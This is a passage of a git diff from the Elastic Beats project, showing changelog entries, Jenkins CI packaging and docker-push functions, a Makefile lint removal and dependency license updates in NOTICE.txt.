Zoom webhooks {pull}20414[20414] - Add type and sub_type to panw panos fileset {pull}20912[20912] -- Always attempt community_id processor on zeek module {pull}21155[21155] - Add related.hosts ecs field to all modules {pull}21160[21160] - Keep cursor state between httpjson input restarts {pull}20751[20751] -- Convert aws s3 to v2 input {pull}20005[20005] -- Add support for additional fields from V2 ALB logs. {pull}21540[21540] -- Release Cloud Foundry input as GA. {pull}21525[21525] -- New Cisco Umbrella dataset {pull}21504[21504] - New juniper.srx dataset for Juniper SRX logs. {pull}20017[20017] - Adding support for Microsoft 365 Defender (Microsoft Threat Protection) {pull}21446[21446] - Adding support for FIPS in s3 input {pull}21446[21446] @@ -831,12 +828,41 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Added support for first_event context in filebeat httpjson input {pull}23437[23437] - Add parsing of tcp flags to AWS vpcflow fileset {issue}228020[22820] {pull}23157[23157] - Added `alternative_host` option to google pubsub input {pull}23215[23215] +- Adding Threat Intel module {pull}21795[21795] - Added username parsing from Cisco ASA message 302013. {pull}21196[21196] - Added `encode_as` and `decode_as` options to httpjson along with pluggable encoders/decoders {pull}23478[23478] +- Added support for Cisco AMP API as a new fileset. {pull}22768[22768] - Added `application/x-ndjson` as decode option for httpjson input {pull}23521[23521] - Added `application/x-www-form-urlencoded` as encode option for httpjson input {pull}23521[23521] +- Move aws-s3 input to GA. {pull}23631[23631] - Populate `source.mac` and `destination.mac` for Suricata EVE events. {issue}23706[23706] {pull}23721[23721] +- Added feature to modules to adapt Ingest Node pipelines for compatibility with older Elasticsearch versions by + removing unsupported processors. {pull}23763[23763] - Added RFC6587 framing option for tcp and unix inputs {issue}23663[23663] {pull}23724[23724] +- Added string splitting for httpjson input {pull}24022[24022] +- Added field mappings for Netflow/IPFIX vendor fields that are known to Filebeat. {issue}23771[23771] +- Added Signatures fileset to Zeek module {pull}23772[23772] +- Upgrade Cisco ASA/FTD/Umbrella to ECS 1.8.0. {pull}23819[23819] +- Add new ECS user and categories features to google_workspace/gsuite {issue}23118[23118] {pull}23709[23709] +- Move crowdstrike JS processor to ingest pipelines and upgrade to ECS 1.8.0 {issue}23118[23118] {pull}23875[23875] +- Update Filebeat auditd dataset to ECS 1.8.0. {pull}23723[23723] {issue}23118[23118] +- Updated microsoft defender_atp and m365_defender to ECS 1.8. {pull}23897[23897] {issue}23118[23118] +- Updated o365 module to ECS 1.8. {issue}23118[23118] {pull}23896[23896] +- Upgrade CEF module to ECS 1.8.0. {pull}23832[23832] +- Upgrade fortinet/firewall to ECS 1.8 {issue}23118[23118] {pull}23902[23902] +- Upgrade Zeek to ECS 1.8.0. {issue}23118[23118] {pull}23847[23847] +- Updated azure module to ECS 1.8. {issue}23118[23118] {pull}23927[23927] +- Update aws/s3access to ECS 1.8. {issue}23118[23118] {pull}23920[23920] +- Upgrade panw module to ecs 1.8 {issue}23118[23118] {pull}23931[23931] +- Updated aws/cloudtrail fileset to ECS 1.8. {issue}23118[23118] {pull}23911[23911] +- Upgrade juniper/srx to ecs 1.8.0. {issue}23118[23118] {pull}23936[23936] +- Update mysqlenterprise module to ECS 1.8. {issue}23118[23118] {pull}23978[23978] +- Upgrade sophos/xg fileset to ECS 1.8.0. {issue}23118[23118] {pull}23967[23967] +- Upgrade system/auth to ECS 1.8 {issue}23118[23118] {pull}23961[23961] +- Upgrade elasticsearch/audit to ECS 1.8 {issue}23118[23118] {pull}24000[24000] +- Upgrade okta to ecs 1.8.0 and move js processor to ingest pipeline {issue}23118[23118] {pull}23929[23929] +- Update zoom module to ECS 1.8. {pull}23904[23904] {issue}23118[23118] + *Heartbeat* @@ -845,6 +871,8 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d *Journalbeat* +- Update Journalbeat to ECS 1.8. {pull}23737[23737] + *Metricbeat* - Move the windows pdh implementation from perfmon to a shared location in order for future modules/metricsets to make use of. {pull}15503[15503] @@ -932,7 +960,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Added cache and connection_errors metrics to status metricset of MySQL module {issue}16955[16955] {pull}19844[19844] - Update MySQL dashboard with connection errors and cache metrics {pull}19913[19913] {issue}16955[16955] - Add cloud.instance.name into aws ec2 metricset. {pull}20077[20077] -- Add host inventory metrics into aws ec2 metricset. {pull}20171[20171] - Add `scope` setting for elasticsearch module, allowing it to monitor an Elasticsearch cluster behind a load-balancing proxy. {issue}18539[18539] {pull}18547[18547] - Add state_daemonset metricset for Kubernetes Metricbeat module {pull}20649[20649] - Add host inventory metrics to azure compute_vm metricset. {pull}20641[20641] @@ -948,7 +975,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Sanitize `event.host`. {pull}21022[21022] - Add support for different Azure Cloud environments in the metricbeat azure module. {pull}21044[21044] {issue}20988[20988] - Add overview and platform health dashboards to Cloud Foundry module. {pull}21124[21124] -- Release lambda metricset in aws module as GA. {issue}21251[21251] {pull}21255[21255] - Add dashboard for pubsub metricset in googlecloud module. {pull}21326[21326] {issue}17137[17137] - Move Prometheus query & remote_write to GA. {pull}21507[21507] - Expand unsupported option from namespace to metrics in the azure module. {pull}21486[21486] @@ -967,6 +993,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Apache: convert status.total_kbytes to status.total_bytes in fleet mode. {pull}23022[23022] - Release MSSQL as GA {pull}23146[23146] - Enrich events of `state_service` metricset with kubernetes services' metadata. {pull}23730[23730] +- Check fields are documented in aws metricsets. {pull}23887[23887] *Packetbeat* @@ -980,6 +1007,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Change build process for x-pack distribution {pull}21979[21979] - Tuned the internal queue size to reduce the chances of events being dropped. {pull}22650[22650] - Add support for "http.request.mime_type" and "http.response.mime_type". {pull}22940[22940] +- Upgrade to ECS 1.8.0. {pull}23783[23783] *Functionbeat* @@ -1006,10 +1034,12 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Add dns.question.subdomain fields for sysmon DNS events. {pull}22999[22999] - Add dns.question.top_level_domain fields for sysmon DNS events. {pull}23046[23046] - Add Audit and Authentication Polixy Change Events and related.ip information {pull}20684[20684] +- Add new ECS 1.8 improvements. {pull}23563[23563] *Elastic Log Driver* - Add support for `docker logs` command {pull}19531[19531] +- Fixed docs for hosts {pull}23644[23644] ==== Deprecated @@ -1022,9 +1052,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d *Filebeat* -- The experimental modules for Citrix Netscaler and Symantec Endpoint Protection have been removed. - As we continue to expand our coverage of common security data sources, we may consider supporting - Citrix Netscaler and Symantec Endpoint Protection in a future release. {issue}23129[23129] {pull}23130[23130] *Heartbeat* @@ -1042,6 +1069,3 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d ==== Known Issue *Journalbeat* - - - diff --git a/Jenkinsfile b/Jenkinsfile index 072f2c3176a2..8e8d67c782b7 100644 --- a/Jenkinsfile +++ b/Jenkinsfile @@ -9,16 +9,18 @@ pipeline { AWS_REGION = "${params.awsRegion}" REPO = 'beats' BASE_DIR = "src/github.com/elastic/${env.REPO}" - DOCKERELASTIC_SECRET = 'secret/observability-team/ci/docker-registry/prod' + DOCKER_ELASTIC_SECRET = 'secret/observability-team/ci/docker-registry/prod' DOCKER_COMPOSE_VERSION = "1.21.0" DOCKER_REGISTRY = 'docker.elastic.co' JOB_GCS_BUCKET = 'beats-ci-temp' JOB_GCS_CREDENTIALS = 'beats-ci-gcs-plugin' + JOB_GCS_EXT_CREDENTIALS = 'beats-ci-gcs-plugin-file-credentials' OSS_MODULE_PATTERN = '^[a-z0-9]+beat\\/module\\/([^\\/]+)\\/.*' PIPELINE_LOG_LEVEL = 'INFO' PYTEST_ADDOPTS = "${params.PYTEST_ADDOPTS}" RUNBLD_DISABLE_NOTIFICATIONS = 'true' SLACK_CHANNEL = "#beats-build" + SNAPSHOT = 'true' TERRAFORM_VERSION = "0.12.24" XPACK_MODULE_PATTERN = '^x-pack\\/[a-z0-9]+beat\\/module\\/([^\\/]+)\\/.*' } @@ -259,17 +261,207 @@ def k8sTest(Map args = [:]) { } } +/** +* This method runs the packaging +*/ +def packagingLinux(Map args = [:]) { + def PLATFORMS = [ '+all', + 'linux/amd64', + 'linux/386', + 'linux/arm64', + 'linux/armv7', + // The platforms above are disabled temporarly as crossbuild images are + // not available. See: https://github.com/elastic/golang-crossbuild/issues/71 + //'linux/ppc64le', + //'linux/mips64', + //'linux/s390x', + 'windows/amd64', + 'windows/386', + (params.macos ? '' : 'darwin/amd64'), + ].join(' ') + withEnv([ + "PLATFORMS=${PLATFORMS}" + ]) { + target(args) + } +} + + +/** +* Upload the packages to their snapshot or pull request buckets +* @param beatsFolder beats folder +*/ +def publishPackages(beatsFolder){ + def bucketUri = "gs://beats-ci-artifacts/snapshots" + if (isPR()) { + bucketUri = "gs://beats-ci-artifacts/pull-requests/pr-${env.CHANGE_ID}" + } + def beatsFolderName = getBeatsName(beatsFolder) + uploadPackages("${bucketUri}/${beatsFolderName}", beatsFolder) + + // Copy those files to another location with the sha commit to test them + // afterward. + bucketUri = "gs://beats-ci-artifacts/commits/${env.GIT_BASE_COMMIT}" + uploadPackages("${bucketUri}/${beatsFolderName}", beatsFolder) +} + +/** +* Upload the distribution files to google cloud. +* TODO: There is a known issue with Google Storage plugin. +* @param bucketUri the buckets URI. +* @param beatsFolder the beats folder. +*/ +def uploadPackages(bucketUri, beatsFolder){ + googleStorageUploadExt(bucket: bucketUri, + credentialsId: "${JOB_GCS_EXT_CREDENTIALS}", + pattern: "${beatsFolder}/build/distributions/**/*", + sharedPublicly: true) +} + +/** +* Push the docker images for the given beat. +* @param beatsFolder beats folder +*/ +def pushCIDockerImages(beatsFolder){ + catchError(buildResult: 'UNSTABLE', message: 'Unable to push Docker images', stageResult: 'FAILURE') { + if (beatsFolder.endsWith('auditbeat')) { + tagAndPush('auditbeat') + } else if (beatsFolder.endsWith('filebeat')) { + tagAndPush('filebeat') + } else if (beatsFolder.endsWith('heartbeat')) { + tagAndPush('heartbeat') + } else if ("${beatsFolder}" == "journalbeat"){ + tagAndPush('journalbeat') + } else if (beatsFolder.endsWith('metricbeat')) { + tagAndPush('metricbeat') + } else if ("${beatsFolder}" == "packetbeat"){ + tagAndPush('packetbeat') + } else if ("${beatsFolder}" == "x-pack/elastic-agent") { + tagAndPush('elastic-agent') + } + } +} + +/** +* Tag and push all the docker images for the given beat. +* @param beatName name of the Beat +*/ +def tagAndPush(beatName){ + def libbetaVer = env.VERSION + if("${env?.SNAPSHOT.trim()}" == "true"){ + aliasVersion = libbetaVer.substring(0, libbetaVer.lastIndexOf(".")) // remove third number in version + + libbetaVer += "-SNAPSHOT" + aliasVersion += "-SNAPSHOT" + } + + def tagName = "${libbetaVer}" + if (isPR()) { + tagName = "pr-${env.CHANGE_ID}" + } + + // supported image flavours + def variants = ["", "-oss", "-ubi8"] + variants.each { variant -> + doTagAndPush(beatName, variant, libbetaVer, tagName) + doTagAndPush(beatName, variant, libbetaVer, "${env.GIT_BASE_COMMIT}") + + if (!isPR() && aliasVersion != "") { + doTagAndPush(beatName, variant, libbetaVer, aliasVersion) + } + } +} + +/** +* Tag and push the given sourceTag docker image with the tag name targetTag. +* @param beatName name of the Beat +* @param variant name of the variant used to build the docker image name +* @param sourceTag tag to be used as source for the docker tag command, usually under the 'beats' namespace +* @param targetTag tag to be used as target for the docker tag command, usually under the 'observability-ci' namespace +*/ +def doTagAndPush(beatName, variant, sourceTag, targetTag) { + def sourceName = "${DOCKER_REGISTRY}/beats/${beatName}${variant}:${sourceTag}" + def targetName = "${DOCKER_REGISTRY}/observability-ci/${beatName}${variant}:${targetTag}" + + def iterations = 0 + retryWithSleep(retries: 3, seconds: 5, backoff: true) { + iterations++ + def status = sh(label: "Change tag and push ${targetName}", script: """#!/usr/bin/env bash + docker images + if docker image inspect "${sourceName}" &> /dev/null ; then + docker tag ${sourceName} ${targetName} + docker push ${targetName} + else + echo 'docker image ${sourceName} does not exist' + fi + """, returnStatus: true) + if ( status > 0 && iterations < 3) { + error("tag and push failed for ${beatName}, retry") + } else if ( status > 0 ) { + log(level: 'WARN', text: "${beatName} doesn't have ${variant} docker images. See https://github.com/elastic/beats/pull/21621") + } + } +} + +/** +* There is a specific folder structure in https://staging.elastic.co/ and https://artifacts.elastic.co/downloads/ +* therefore the storage bucket in GCP should follow the same folder structure. +* This is required by https://github.com/elastic/beats-tester +* e.g. +* baseDir=name -> return name +* baseDir=name1/name2/name3-> return name2 +*/ +def getBeatsName(baseDir) { + return baseDir.replace('x-pack/', '') +} + +/** +* This method runs the end 2 end testing in the same worker where the packages have been +* generated, this should help to speed up the things +*/ +def e2e(Map args = [:]) { + def enabled = args.e2e?.get('enabled', false) + def entrypoint = args.e2e?.get('entrypoint') + def dockerLogFile = "docker_logs_${entrypoint}.log" + if (!enabled) { return } + dir("${env.WORKSPACE}/src/github.com/elastic/e2e-testing") { + // TBC with the target branch if running on a PR basis. + git(branch: 'master', credentialsId: '2a9602aa-ab9f-4e52-baf3-b71ca88469c7-UserAndToken', url: 'https://github.com/elastic/e2e-testing.git') + if(isDockerInstalled()) { + dockerLogin(secret: "${DOCKER_ELASTIC_SECRET}", registry: "${DOCKER_REGISTRY}") + } + def goVersionForE2E = readFile('.go-version').trim() + withEnv(["GO_VERSION=${goVersionForE2E}", + "BEATS_LOCAL_PATH=${env.WORKSPACE}/${env.BASE_DIR}", + "LOG_LEVEL=TRACE"]) { + def status = 0 + filebeat(output: dockerLogFile){ + status = sh(script: ".ci/scripts/${entrypoint}", + label: "Run functional tests ${entrypoint}", + returnStatus: true) + } + junit(allowEmptyResults: true, keepLongStdio: true, testResults: "outputs/TEST-*.xml") + archiveArtifacts allowEmptyArchive: true, artifacts: "outputs/TEST-*.xml" + if (status != 0) { + error("ERROR: functional tests for ${args?.directory?.trim()} has failed. See the test report and ${dockerLogFile}.") + } + } + } +} + /** * This method runs the given command supporting two kind of scenarios: * - make -C then the dir(location) is not required, aka by disaling isMage: false * - mage then the dir(location) is required, aka by enabling isMage: true. */ def target(Map args = [:]) { - def context = args.context def command = args.command + def context = args.context def directory = args.get('directory', '') def withModule = args.get('withModule', false) def isMage = args.get('isMage', false) + def isE2E = args.e2e?.get('enabled', false) + def isPackaging = args.get('package', false) withNode(args.label) { withGithubNotify(context: "${context}") { withBeatsEnv(archive: true, withModule: withModule, directory: directory, id: args.id) { @@ -279,6 +471,19 @@ def target(Map args = [:]) { dir(isMage ? directory : '') { cmd(label: "${args.id?.trim() ? args.id : env.STAGE_NAME} - ${command}", script: "${command}") } + // TODO: + // Packaging should happen only after the e2e? + if (isPackaging) { + publishPackages("${directory}") + } + if(isE2E) { + e2e(args) + } + // TODO: + // push docker images should happen only after the e2e? + if (isPackaging) { + pushCIDockerImages("${directory}") + } } } } @@ -354,7 +559,7 @@ def withBeatsEnv(Map args = [:], Closure body) { "USERPROFILE=${userProfile}" ]) { if(isDockerInstalled()) { - dockerLogin(secret: "${DOCKERELASTIC_SECRET}", registry: "${DOCKER_REGISTRY}") + dockerLogin(secret: "${DOCKER_ELASTIC_SECRET}", registry: "${DOCKER_REGISTRY}") } dir("${env.BASE_DIR}") { installTools(args) @@ -486,11 +691,10 @@ def archiveTestOutput(Map args = [:]) { */ def tarAndUploadArtifacts(Map args = [:]) { tar(file: args.file, dir: args.location, archive: false, allowMissing: true) - googleStorageUpload(bucket: "gs://${JOB_GCS_BUCKET}/${env.JOB_NAME}-${env.BUILD_ID}", - credentialsId: "${JOB_GCS_CREDENTIALS}", - pattern: "${args.file}", - sharedPublicly: true, - showInline: true) + googleStorageUploadExt(bucket: "gs://${JOB_GCS_BUCKET}/${env.JOB_NAME}-${env.BUILD_ID}", + credentialsId: "${JOB_GCS_EXT_CREDENTIALS}", + pattern: "${args.file}", + sharedPublicly: true) } /** @@ -654,9 +858,6 @@ def dumpVariables(){ PYTHON_EXE: ${env.PYTHON_EXE} PYTHON_TEST_FILES: ${env.PYTHON_TEST_FILES} PROCESSES: ${env.PROCESSES} - REVIEWDOG: ${env.REVIEWDOG} - REVIEWDOG_OPTIONS: ${env.REVIEWDOG_OPTIONS} - REVIEWDOG_REPO: ${env.REVIEWDOG_REPO} STRESS_TESTS: ${env.STRESS_TESTS} STRESS_TEST_OPTIONS: ${env.STRESS_TEST_OPTIONS} SYSTEM_TESTS: ${env.SYSTEM_TESTS} @@ -673,12 +874,14 @@ def dumpVariables(){ } def isDockerInstalled(){ - if (isUnix()) { - // TODO: some issues with macosx if(isInstalled(tool: 'docker', flag: '--version')) { - return sh(label: 'check for Docker', script: 'command -v docker', returnStatus: true) - } else { + if (env?.NODE_LABELS?.toLowerCase().contains('macosx')) { + log(level: 'WARN', text: "Macosx workers require some docker-machine context. They are not used for anything related to docker stuff yet.") return false } + if (isUnix()) { + return sh(label: 'check for Docker', script: 'command -v docker', returnStatus: true) == 0 + } + return false } /** @@ -714,6 +917,9 @@ class RunCommand extends co.elastic.beats.BeatsFunction { if(args?.content?.containsKey('mage')) { steps.target(context: args.context, command: args.content.mage, directory: args.project, label: args.label, withModule: withModule, isMage: true, id: args.id) } + if(args?.content?.containsKey('packaging-linux')) { + steps.packagingLinux(context: args.context, command: args.content.get('packaging-linux'), directory: args.project, label: args.label, isMage: true, id: args.id, e2e: args.content.get('e2e'), package: true) + } if(args?.content?.containsKey('k8sTest')) { steps.k8sTest(context: args.context, versions: args.content.k8sTest.split(','), label: args.label, id: args.id) } diff --git a/Makefile b/Makefile index bd0da94f1297..6080779c7bb8 100644 --- a/Makefile +++ b/Makefile @@ -10,9 +10,6 @@ VENV_PARAMS?= FIND=find . -type f -not -path "*/build/*" -not -path "*/.git/*" GOLINT=golint GOLINT_REPO=golang.org/x/lint/golint -REVIEWDOG=reviewdog -REVIEWDOG_OPTIONS?=-diff "git diff master" -REVIEWDOG_REPO=github.com/reviewdog/reviewdog/cmd/reviewdog XPACK_SUFFIX=x-pack/ # PROJECTS_XPACK_PKG is a list of Beats that have independent packaging support @@ -151,12 +148,6 @@ fmt: add-headers python-env @# Cleans also python files which are not part of the beats @$(FIND) -name "*.py" -exec $(PYTHON_ENV)/bin/autopep8 --in-place --max-line-length 120 {} \; -## lint : TBD. -.PHONY: lint -lint: - @go get $(GOLINT_REPO) $(REVIEWDOG_REPO) - $(REVIEWDOG) $(REVIEWDOG_OPTIONS) - ## docs : Builds the documents for each beat .PHONY: docs docs: @@ -206,6 +197,7 @@ snapshot: ## release : Builds a release. .PHONY: release release: beats-dashboards + @mage dumpVariables @$(foreach var,$(BEATS) $(PROJECTS_XPACK_PKG),$(MAKE) -C $(var) release || exit 1;) @$(foreach var,$(BEATS) $(PROJECTS_XPACK_PKG), \ test -d $(var)/build/distributions && test -n "$$(ls $(var)/build/distributions)" || exit 0; \ @@ -219,7 +211,7 @@ release-manager-snapshot: ## release-manager-release : Builds a snapshot release. The Go version defined in .go-version will be installed and used for the build. .PHONY: release-manager-release release-manager-release: - ./dev-tools/run_with_go_ver $(MAKE) release + GO_VERSION=$(shell cat ./.go-version) ./dev-tools/run_with_go_ver $(MAKE) release ## beats-dashboards : Collects dashboards from all Beats and generates a zip file distribution. .PHONY: beats-dashboards diff --git a/NOTICE.txt b/NOTICE.txt index 8543b71771d7..d8956ba5a9b5 100644 --- a/NOTICE.txt +++ b/NOTICE.txt @@ -5891,11 +5891,11 @@ This Agreement is governed by the laws of the State of New York and the intellec -------------------------------------------------------------------------------- Dependency : github.com/elastic/ecs -Version: v1.6.0 +Version: v1.0.0-beta2.0.20210202203518-638aa2bb5271 Licence type (autodetected): Apache-2.0 -------------------------------------------------------------------------------- -Contents of probable licence file $GOMODCACHE/github.com/elastic/ecs@v1.6.0/LICENSE.txt: +Contents of probable licence file $GOMODCACHE/github.com/elastic/ecs@v1.0.0-beta2.0.20210202203518-638aa2bb5271/LICENSE.txt: Apache License @@ -6336,11 +6336,11 @@ SOFTWARE -------------------------------------------------------------------------------- Dependency : github.com/elastic/go-concert -Version: v0.0.4 +Version: v0.1.0 Licence type (autodetected): Apache-2.0 -------------------------------------------------------------------------------- -Contents of probable licence file $GOMODCACHE/github.com/elastic/go-concert@v0.0.4/LICENSE: +Contents of probable licence file $GOMODCACHE/github.com/elastic/go-concert@v0.1.0/LICENSE: Apache License Version 2.0, January 2004 @@ -6547,11 +6547,11 @@ Contents of probable licence file $GOMODCACHE/github.com/elastic/go-concert@v0.0 -------------------------------------------------------------------------------- Dependency : github.com/elastic/go-libaudit/v2 -Version: v2.1.0 +Version: v2.2.0 Licence type (autodetected): Apache-2.0 -------------------------------------------------------------------------------- -Contents of probable licence file $GOMODCACHE/github.com/elastic/go-libaudit/v2@v2.1.0/LICENSE.txt: +Contents of probable licence file $GOMODCACHE/github.com/elastic/go-libaudit/v2@v2.2.0/LICENSE.txt: Apache License @@ -7665,11 +7665,11 @@ Contents of probable licence file $GOMODCACHE/github.com/elastic/go-structform@v -------------------------------------------------------------------------------- Dependency : github.com/elastic/go-sysinfo -Version: v1.3.0 +Version: v1.5.0 Licence type (autodetected): Apache-2.0 -------------------------------------------------------------------------------- -Contents of probable licence file $GOMODCACHE/github.com/elastic/go-sysinfo@v1.3.0/LICENSE.txt: +Contents of probable licence file $GOMODCACHE/github.com/elastic/go-sysinfo@v1.5.0/LICENSE.txt: Apache License @@ -13745,37 +13745,6 @@ are those of the authors and should not be interpreted as representing official policies, either expressed or implied, of Richard Crowley. --------------------------------------------------------------------------------- -Dependency : github.com/reviewdog/reviewdog -Version: v0.9.17 -Licence type (autodetected): MIT --------------------------------------------------------------------------------- - -Contents of probable licence file $GOMODCACHE/github.com/reviewdog/reviewdog@v0.9.17/LICENSE: - -MIT License - -Copyright (c) 2016 haya14busa - -Permission is hereby granted, free of charge, to any person obtaining a copy -of this software and associated documentation files (the "Software"), to deal -in the Software without restriction, including without limitation the rights -to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -copies of the Software, and to permit persons to whom the Software is -furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all -copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -SOFTWARE. - - -------------------------------------------------------------------------------- Dependency : github.com/samuel/go-thrift Version: v0.0.0-20140522043831-2187045faa54 @@ -21826,207 +21795,6 @@ THE SOFTWARE. --------------------------------------------------------------------------------- -Dependency : github.com/bradleyfalzon/ghinstallation -Version: v1.1.0 -Licence type (autodetected): Apache-2.0 --------------------------------------------------------------------------------- - -Contents of probable licence file $GOMODCACHE/github.com/bradleyfalzon/ghinstallation@v1.1.0/LICENSE: - - - Apache License - Version 2.0, January 2004 - http://www.apache.org/licenses/ - - TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION - - 1. Definitions. - - "License" shall mean the terms and conditions for use, reproduction, - and distribution as defined by Sections 1 through 9 of this document. - - "Licensor" shall mean the copyright owner or entity authorized by - the copyright owner that is granting the License. - - "Legal Entity" shall mean the union of the acting entity and all - other entities that control, are controlled by, or are under common - control with that entity. For the purposes of this definition, - "control" means (i) the power, direct or indirect, to cause the - direction or management of such entity, whether by contract or - otherwise, or (ii) ownership of fifty percent (50%) or more of the - outstanding shares, or (iii) beneficial ownership of such entity. - - "You" (or "Your") shall mean an individual or Legal Entity - exercising permissions granted by this License. - - "Source" form shall mean the preferred form for making modifications, - including but not limited to software source code, documentation - source, and configuration files. - - "Object" form shall mean any form resulting from mechanical - transformation or translation of a Source form, including but - not limited to compiled object code, generated documentation, - and conversions to other media types. - - "Work" shall mean the work of authorship, whether in Source or - Object form, made available under the License, as indicated by a - copyright notice that is included in or attached to the work - (an example is provided in the Appendix below). - - "Derivative Works" shall mean any work, whether in Source or Object - form, that is based on (or derived from) the Work and for which the - editorial revisions, annotations, elaborations, or other modifications - represent, as a whole, an original work of authorship. For the purposes - of this License, Derivative Works shall not include works that remain - separable from, or merely link (or bind by name) to the interfaces of, - the Work and Derivative Works thereof. - - "Contribution" shall mean any work of authorship, including - the original version of the Work and any modifications or additions - to that Work or Derivative Works thereof, that is intentionally - submitted to Licensor for inclusion in the Work by the copyright owner - or by an individual or Legal Entity authorized to submit on behalf of - the copyright owner. For the purposes of this definition, "submitted" - means any form of electronic, verbal, or written communication sent - to the Licensor or its representatives, including but not limited to - communication on electronic mailing lists, source code control systems, - and issue tracking systems that are managed by, or on behalf of, the - Licensor for the purpose of discussing and improving the Work, but - excluding communication that is conspicuously marked or otherwise - designated in writing by the copyright owner as "Not a Contribution." - - "Contributor" shall mean Licensor and any individual or Legal Entity - on behalf of whom a Contribution has been received by Licensor and - subsequently incorporated within the Work. - - 2. Grant of Copyright License. Subject to the terms and conditions of - this License, each Contributor hereby grants to You a perpetual, - worldwide, non-exclusive, no-charge, royalty-free, irrevocable - copyright license to reproduce, prepare Derivative Works of, - publicly display, publicly perform, sublicense, and distribute the - Work and such Derivative Works in Source or Object form. - - 3. Grant of Patent License. Subject to the terms and conditions of - this License, each Contributor hereby grants to You a perpetual, - worldwide, non-exclusive, no-charge, royalty-free, irrevocable - (except as stated in this section) patent license to make, have made, - use, offer to sell, sell, import, and otherwise transfer the Work, - where such license applies only to those patent claims licensable - by such Contributor that are necessarily infringed by their - Contribution(s) alone or by combination of their Contribution(s) - with the Work to which such Contribution(s) was submitted. If You - institute patent litigation against any entity (including a - cross-claim or counterclaim in a lawsuit) alleging that the Work - or a Contribution incorporated within the Work constitutes direct - or contributory patent infringement, then any patent licenses - granted to You under this License for that Work shall terminate - as of the date such litigation is filed. - - 4. Redistribution. You may reproduce and distribute copies of the - Work or Derivative Works thereof in any medium, with or without - modifications, and in Source or Object form, provided that You - meet the following conditions: - - (a) You must give any other recipients of the Work or - Derivative Works a copy of this License; and - - (b) You must cause any modified files to carry prominent notices - stating that You changed the files; and - - (c) You must retain, in the Source form of any Derivative Works - that You distribute, all copyright, patent, trademark, and - attribution notices from the Source form of the Work, - excluding those notices that do not pertain to any part of - the Derivative Works; and - - (d) If the Work includes a "NOTICE" text file as part of its - distribution, then any Derivative Works that You distribute must - include a readable copy of the attribution notices contained - within such NOTICE file, excluding those notices that do not - pertain to any part of the Derivative Works, in at least one - of the following places: within a NOTICE text file distributed - as part of the Derivative Works; within the Source form or - documentation, if provided along with the Derivative Works; or, - within a display generated by the Derivative Works, if and - wherever such third-party notices normally appear. The contents - of the NOTICE file are for informational purposes only and - do not modify the License. You may add Your own attribution - notices within Derivative Works that You distribute, alongside - or as an addendum to the NOTICE text from the Work, provided - that such additional attribution notices cannot be construed - as modifying the License. - - You may add Your own copyright statement to Your modifications and - may provide additional or different license terms and conditions - for use, reproduction, or distribution of Your modifications, or - for any such Derivative Works as a whole, provided Your use, - reproduction, and distribution of the Work otherwise complies with - the conditions stated in this License. - - 5. Submission of Contributions. Unless You explicitly state otherwise, - any Contribution intentionally submitted for inclusion in the Work - by You to the Licensor shall be under the terms and conditions of - this License, without any additional terms or conditions. - Notwithstanding the above, nothing herein shall supersede or modify - the terms of any separate license agreement you may have executed - with Licensor regarding such Contributions. - - 6. Trademarks. This License does not grant permission to use the trade - names, trademarks, service marks, or product names of the Licensor, - except as required for reasonable and customary use in describing the - origin of the Work and reproducing the content of the NOTICE file. - - 7. Disclaimer of Warranty. Unless required by applicable law or - agreed to in writing, Licensor provides the Work (and each - Contributor provides its Contributions) on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or - implied, including, without limitation, any warranties or conditions - of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A - PARTICULAR PURPOSE. You are solely responsible for determining the - appropriateness of using or redistributing the Work and assume any - risks associated with Your exercise of permissions under this License. - - 8. Limitation of Liability. In no event and under no legal theory, - whether in tort (including negligence), contract, or otherwise, - unless required by applicable law (such as deliberate and grossly - negligent acts) or agreed to in writing, shall any Contributor be - liable to You for damages, including any direct, indirect, special, - incidental, or consequential damages of any character arising as a - result of this License or out of the use or inability to use the - Work (including but not limited to damages for loss of goodwill, - work stoppage, computer failure or malfunction, or any and all - other commercial damages or losses), even if such Contributor - has been advised of the possibility of such damages. - - 9. Accepting Warranty or Additional Liability. While redistributing - the Work or Derivative Works thereof, You may choose to offer, - and charge a fee for, acceptance of support, warranty, indemnity, - or other liability obligations and/or rights consistent with this - License. However, in accepting such obligations, You may act only - on Your own behalf and on Your sole responsibility, not on behalf - of any other Contributor, and only if You agree to indemnify, - defend, and hold each Contributor harmless for any liability - incurred by, or claims asserted against, such Contributor 